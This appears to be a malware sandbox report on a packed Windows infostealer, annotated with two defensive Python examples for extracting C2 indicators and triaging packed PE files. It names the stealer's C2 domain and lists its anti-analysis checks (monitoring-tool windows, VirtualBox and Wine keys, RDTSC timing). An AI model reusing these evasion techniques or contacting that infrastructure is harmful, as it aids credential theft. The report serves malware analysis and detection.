Source: pPizCGDvrx.exe, pPizCGDvrx.exe, 00000000.00000003.1437780478.000000000115A000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1547189267.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000002.1756296489.0000000001158000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1754892767.0000000001158000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1755223714.0000000001158000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1600613999.00000000011D9000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1546879090.00000000011EC000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1603018790.00000000011D9000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1437659594.0000000001158000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1600571554.00000000011E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://grannyejh.lat/api
Source: pPizCGDvrx.exe, 00000000.00000002.1756690646.00000000011ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://grannyejh.lat/api6
Source: pPizCGDvrx.exe, 00000000.00000003.1437780478.000000000115A000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1437659594.0000000001158000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://grannyejh.lat/apiG
Source: pPizCGDvrx.exe, 00000000.00000003.1437780478.000000000115A000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1437659594.0000000001158000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://grannyejh.lat/apigsA
Source: pPizCGDvrx.exe, 00000000.00000003.1671204983.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000002.1756690646.00000000011ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://grannyejh.lat/apiz
Source: pPizCGDvrx.exe, 00000000.00000002.1756296489.0000000001158000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1754892767.0000000001158000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1755223714.0000000001158000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://grannyejh.lat/apiz0y
Source: pPizCGDvrx.exe, 00000000.00000003.1437780478.000000000115A000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1437659594.0000000001158000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://grannyejh.lat/s
Source: pPizCGDvrx.exe, 00000000.00000003.1755109523.00000000011B1000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1657908110.00000000011B1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://grannyejh.lat:443/api
                Source: pPizCGDvrx.exe, 00000000.00000003.1755353022.00000000011BE000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000002.1756627823.00000000011BF000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1755109523.00000000011B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat:443/apitA
                Source: pPizCGDvrx.exe, 00000000.00000003.1549012644.0000000005A60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
                Source: pPizCGDvrx.exe, 00000000.00000003.1548557510.0000000005B72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: pPizCGDvrx.exe, 00000000.00000003.1548557510.0000000005B72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: pPizCGDvrx.exe, 00000000.00000003.1549012644.0000000005A60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
                Source: pPizCGDvrx.exe, 00000000.00000003.1438509200.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438578536.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438368607.0000000005A9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: pPizCGDvrx.exe, 00000000.00000003.1438509200.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438578536.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438368607.0000000005A9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: pPizCGDvrx.exe, 00000000.00000003.1549012644.0000000005A60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                Source: pPizCGDvrx.exe, 00000000.00000003.1548557510.0000000005B72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
                Source: pPizCGDvrx.exe, 00000000.00000003.1548557510.0000000005B72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
                Source: pPizCGDvrx.exe, 00000000.00000003.1548557510.0000000005B72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
                Source: pPizCGDvrx.exe, 00000000.00000003.1548557510.0000000005B72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: pPizCGDvrx.exe, 00000000.00000003.1548557510.0000000005B72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown | Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown | HTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.7:49723 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.7:49735 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.7:49754 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.7:49765 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.7:49781 version: TLS 1.2
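The URL strings above mix two populations: the grannyejh.lat entries come from the stealer's own configuration (the report's C2 URL finding), while the mozilla.org, google.com and ecosia.org entries are default browser bookmarks and new-tab tiles that the sample read out of the browser profile. The many variants of the same C2 path (/api, /api6, /apiG, /apiz0y) are memory-dump artifacts: the string extractor ran past the terminating NUL into adjacent bytes. Also, the 172.67.179.109 address the TLS sessions go to is a Cloudflare edge, so the domain, not the IP, is the durable indicator. The following is an added example, not part of the Joe Sandbox report or the sample's code, showing one way to turn such findings into a hunt list: group URLs by host, pick the path stem that the junk-extended variants share, and separate allowlisted browser hosts from candidate C2. The REPORT_LINES list is constructed from the report lines above and the BENIGN_SUFFIXES allowlist is an assumption.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import urlsplit

# Constructed input: URL findings copied from the report lines above. Memory-dump
# strings often run past the real terminator, so the same C2 path shows up with
# junk suffixes ("/api6", "/apiG", "/apiz0y") next to the clean "/api".
REPORT_LINES = [
    "String found in binary or memory: https://grannyejh.lat/H",
    "String found in binary or memory: https://grannyejh.lat/P",
    "String found in binary or memory: https://grannyejh.lat/api",
    "String found in binary or memory: https://grannyejh.lat/api",
    "String found in binary or memory: https://grannyejh.lat/api6",
    "String found in binary or memory: https://grannyejh.lat/apiG",
    "String found in binary or memory: https://grannyejh.lat/apigsA",
    "String found in binary or memory: https://grannyejh.lat/apiz",
    "String found in binary or memory: https://grannyejh.lat/apiz0y",
    "String found in binary or memory: https://grannyejh.lat/s",
    "String found in binary or memory: https://grannyejh.lat:443/api",
    "String found in binary or memory: https://grannyejh.lat:443/apitA",
    "String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all",
    "String found in binary or memory: https://www.ecosia.org/newtab/",
    "String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico",
    "String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.",
]

URL_RE = re.compile(r"https?://[^\s\"'<>]+")

# Assumed allowlist (not from the report): hosts that default browser bookmarks and
# new-tab pages put into a profile, which a stealer reading that profile carries in memory.
BENIGN_SUFFIXES = ("mozilla.org", "google.com", "ecosia.org", "amazon.com")


def is_benign(host: str) -> bool:
    return any(host == s or host.endswith("." + s) for s in BENIGN_SUFFIXES)


def path_stem(paths: Counter) -> str:
    """Pick the path that prefixes the most observed variants.

    "/api" prefixes "/api6", "/apiG", "/apiz0y", ..., so it wins over the junk-extended
    forms and over fragments ("/H", "/P") that prefix nothing else. Ties go to the
    more frequent, then the shorter, path.
    """
    def score(p: str):
        return (sum(1 for q in paths if q.startswith(p)), paths[p], -len(p))
    return max(paths, key=score)


def extract_iocs(lines):
    """Group every URL by host: hit count, raw path variants, path stem, allowlist verdict."""
    per_host = defaultdict(Counter)
    for line in lines:
        for url in URL_RE.findall(line):
            parts = urlsplit(url)
            host = (parts.hostname or "").lower()  # hostname drops the ":443" port
            if host:
                per_host[host][parts.path or "/"] += 1
    return {
        host: {
            "benign": is_benign(host),
            "hits": sum(paths.values()),
            "variants": sorted(paths),
            "stem": path_stem(paths),
        }
        for host, paths in per_host.items()
    }


def c2_candidates(iocs):
    """Hosts not covered by the allowlist: what goes into the blocklist or hunt query."""
    return {host: info for host, info in iocs.items() if not info["benign"]}


if __name__ == "__main__":
    for host, info in c2_candidates(extract_iocs(REPORT_LINES)).items():
        print(f"{host}  stem={info['stem']}  hits={info['hits']}  variants={len(info['variants'])}")
```

Run against the constructed lines this yields a single candidate, grannyejh.lat with stem /api, which matches the C2 URL the report extracted from the malware configuration; the allowlist should be reviewed per case, since a stealer may also be configured with a lookalike of a legitimate domain.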

                System Summary

Source: pPizCGDvrx.exe | Static PE information: section name:
Source: pPizCGDvrx.exe | Static PE information: section name: .idata
Source: pPizCGDvrx.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Code function: 0_3_01162889
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Code function: 0_3_011628D4
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Code function: 0_3_01162B79
Source: pPizCGDvrx.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: pPizCGDvrx.exe | Static PE information: Section: ZLIB complexity 0.9974114404965754
Source: pPizCGDvrx.exe | Static PE information: Section: iottbtod ZLIB complexity 0.9948973730117047
Source: pPizCGDvrx.exe | Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@2/1
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: pPizCGDvrx.exe, 00000000.00000003.1439169970.0000000005A6E000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438846358.0000000005A89000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1488174729.0000000005A92000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: pPizCGDvrx.exe | ReversingLabs: Detection: 57%
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | File read: C:\Users\user\Desktop\pPizCGDvrx.exe
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Section loaded: webio.dll
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Section loaded: ondemandconnroutehelper.dll
Source: pPizCGDvrx.exe | Static file information: File size 1871360 > 1048576
Source: pPizCGDvrx.exe | Static PE information: Raw size of iottbtod is bigger than: 0x100000 < 0x1a0800

                Data Obfuscation

Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Unpacked PE file: 0.2.pPizCGDvrx.exe.bc0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;iottbtod:EW;ugfsaeak:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;iottbtod:EW;ugfsaeak:EW;.taggant:EW;
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: pPizCGDvrx.exe | Static PE information: real checksum: 0x1d57d1 should be: 0x1d731c
Source: pPizCGDvrx.exe | Static PE information: section name:
Source: pPizCGDvrx.exe | Static PE information: section name: .idata
Source: pPizCGDvrx.exe | Static PE information: section name:
Source: pPizCGDvrx.exe | Static PE information: section name: iottbtod
Source: pPizCGDvrx.exe | Static PE information: section name: ugfsaeak
Source: pPizCGDvrx.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Code function: 0_3_011C897A push ecx; retf 0_3_011C89A0
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Code function: 0_3_011E6D64 push esi; retf 0_3_011E6D67
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Code function: 0_3_0115E511 pushfd ; retf 0_3_0115E512
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Code function: 0_3_0115D1C0 push ebx; iretd 0_3_0115D1C3
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Code function: 0_3_0115D1CD push ebx; iretd 0_3_0115D1BB
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Code function: 0_3_0115CFE2 push ebx; iretd 0_3_0115D1BB
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Code function: 0_3_05A62FC6 push ds; iretd 0_3_05A62FC4
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Code function: 0_3_05A62F70 push ds; iretd 0_3_05A62FC4
Source: pPizCGDvrx.exe | Static PE information: section name: entropy: 7.978884009645504
Source: pPizCGDvrx.exe | Static PE information: section name: iottbtod entropy: 7.953350662894027
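Taken together, the static findings in this section describe a packed binary: sections with empty or special-character names, entropy close to the 8.0 maximum in the unnamed section and in iottbtod, an entry point in .taggant rather than .text, sections that are writable and executable, and a header checksum that does not match the file. The following is an added example, not code from the report or from the sample, that computes each of these indicators from the raw PE headers without any third-party library. The build_sample_pe() helper constructs a synthetic PE32 with the same section layout as the report describes so the example runs offline; its section contents are random filler, not bytes from pPizCGDvrx.exe, and the 7.0 entropy threshold is an assumption.

```python
import math
import random
import struct
from collections import Counter

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
PRINTABLE = frozenset(range(0x21, 0x7F))


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for constant data, 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def pe_checksum(pe: bytes) -> int:
    """CheckSumMappedFile algorithm: fold 16-bit words with carry, skipping the
    CheckSum field itself (optional header + 64), then add the file length."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    cs_off = e_lfanew + 24 + 64
    data = pe if len(pe) % 2 == 0 else pe + b"\0"
    total = 0
    for off in range(0, len(data), 2):
        if off in (cs_off, cs_off + 2):
            continue
        total += struct.unpack_from("<H", data, off)[0]
        total = (total & 0xFFFF) + (total >> 16)
    total = (total & 0xFFFF) + (total >> 16)
    return (total + len(pe)) & 0xFFFFFFFF


def with_checksum(pe: bytes) -> bytes:
    """Copy of the image with the correct CheckSum written into the optional header."""
    fixed = bytearray(pe)
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    struct.pack_into("<I", fixed, e_lfanew + 24 + 64, pe_checksum(pe))
    return bytes(fixed)


def parse_pe(pe: bytes):
    """Return (AddressOfEntryPoint, stored CheckSum, section dicts) of a PE32/PE32+ file."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    nsec, = struct.unpack_from("<H", pe, e_lfanew + 6)
    opt_size, = struct.unpack_from("<H", pe, e_lfanew + 20)
    opt = e_lfanew + 24
    entry, = struct.unpack_from("<I", pe, opt + 16)
    stored_cs, = struct.unpack_from("<I", pe, opt + 64)
    sections = []
    for i in range(nsec):
        off = opt + opt_size + 40 * i  # section table follows the optional header
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", pe, off)
        chars, = struct.unpack_from("<I", pe, off + 36)
        sections.append({"name": name.rstrip(b"\0"), "va": va, "vsize": vsize,
                         "raw": pe[rawptr:rawptr + rawsize], "chars": chars})
    return entry, stored_cs, sections


def triage(pe: bytes, entropy_threshold: float = 7.0):
    """Static packer indicators of the kind the report lists above."""
    entry, stored_cs, sections = parse_pe(pe)
    findings = []
    for s in sections:
        label = s["name"].decode("latin-1") or "<empty>"
        if not s["name"] or any(b not in PRINTABLE for b in s["name"]):
            findings.append(f"section name with special chars: {s['name']!r}")
        ent = shannon_entropy(s["raw"])
        if ent > entropy_threshold:
            findings.append(f"high entropy {ent:.3f} in section {label}")
        if s["chars"] & IMAGE_SCN_MEM_WRITE and s["chars"] & IMAGE_SCN_MEM_EXECUTE:
            findings.append(f"section {label} is writable and executable")
        if s["va"] <= entry < s["va"] + max(s["vsize"], len(s["raw"])) and label != ".text":
            findings.append(f"entry point 0x{entry:x} is in section {label}")
    real_cs = pe_checksum(pe)
    if stored_cs and stored_cs != real_cs:  # a zero CheckSum is common in unsigned builds
        findings.append(f"checksum mismatch: header 0x{stored_cs:x}, computed 0x{real_cs:x}")
    return findings


def build_sample_pe(seed: int = 1) -> bytes:
    """Constructed PE32 mimicking the report's layout (unnamed RWX section, packed
    'iottbtod', entry point in '.taggant', wrong checksum). Random filler, not the sample."""
    rng = random.Random(seed)
    sections = [  # (name, virtual address, raw bytes, characteristics)
        (b"", 0x1000, rng.randbytes(0x2000), 0xE0000040),
        (b".idata", 0x3000, bytes(0x200), 0xC0000040),
        (b"iottbtod", 0x4000, rng.randbytes(0x3000), 0xE0000040),
        (b".taggant", 0x8000, b"\x55\x8B\xEC" + bytes(0x1FD), 0x60000020),
    ]
    opt_size, file_align = 224, 0x200
    raw_hdr = 0x40 + 4 + 20 + opt_size + 40 * len(sections)
    hdr_len = (raw_hdr + file_align - 1) // file_align * file_align
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                 # e_lfanew
    file_hdr = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                   # PE32 magic
    struct.pack_into("<I", opt, 16, 0x8000)                 # AddressOfEntryPoint -> .taggant
    struct.pack_into("<I", opt, 64, 0x1234)                 # deliberately wrong CheckSum
    table, body, ptr = bytearray(), bytearray(), hdr_len
    for name, va, raw, chars in sections:
        table += struct.pack("<8sIIIIIIHHI", name, len(raw), va, len(raw), ptr, 0, 0, 0, 0, chars)
        body += raw
        ptr += len(raw)
    return bytes((dos + b"PE\0\0" + file_hdr + opt + table).ljust(hdr_len, b"\0") + body)


if __name__ == "__main__":
    for finding in triage(build_sample_pe()):
        print("-", finding)
```

None of these indicators is malicious on its own: commercial protectors produce the same entropy and section profile, and a checksum of zero is normal for unsigned builds. Their value is as a fast pre-filter that routes a file to unpacking and dynamic analysis, which is what the report's remaining findings then supply.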

                Boot Survival

Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\pPizCGDvrx.exe | System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: C18484 second address: C1848B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: C1848B second address: C18491 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: C18491 second address: C18495 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: D95266 second address: D9528A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jg 00007F2A2CEBE356h 0x0000000c pop eax 0x0000000d jl 00007F2A2CEBE364h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: D9528A second address: D952AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A2C61915Bh 0x00000009 jmp 00007F2A2C61915Ah 0x0000000e popad 0x0000000f popad 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: D953F7 second address: D953FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: D953FC second address: D9541C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 jmp 00007F2A2C61915Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jg 00007F2A2C61918Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 push esi 0x00000019 pop esi 0x0000001a rdtsc
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: D9541C second address: D95430 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2A2CEBE356h 0x00000008 jc 00007F2A2CEBE356h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: D955AB second address: D955B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: D955B1 second address: D955B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
